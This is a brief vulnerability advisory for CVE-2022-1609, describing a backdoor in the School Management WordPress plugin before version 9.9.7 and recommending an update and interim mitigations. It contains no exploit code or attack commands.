CVE-2022-1609

Name of the Vulnerable Software and Affected Versions School Management WordPress plugin versions prior to 9.9.7

Description The issue is related to an obfuscated backdoor injected in the license checking code of the School Management WordPress plugin, which registers a REST API handler. This allows an unauthenticated attacker to execute arbitrary PHP code on the site, potentially leading to full control over the application. The estimated number of potentially affected devices worldwide is over 340,000, as the plugin's creator, Weblizar, claims to have more than 340,000 clients using its premium and free WordPress themes and plugins. The vulnerability was discovered in the premium versions of the plugin prior to 9.9.7 and is considered highly severe.

Recommendations For School Management WordPress plugin versions prior to 9.9.7, update the plugin to version 9.9.7 or later to prevent exploitation. As a temporary workaround, consider disabling the REST API handler registered by the plugin's license checking code until a patch is available. Restrict access to the plugin's license checking functionality to minimize the risk of exploitation.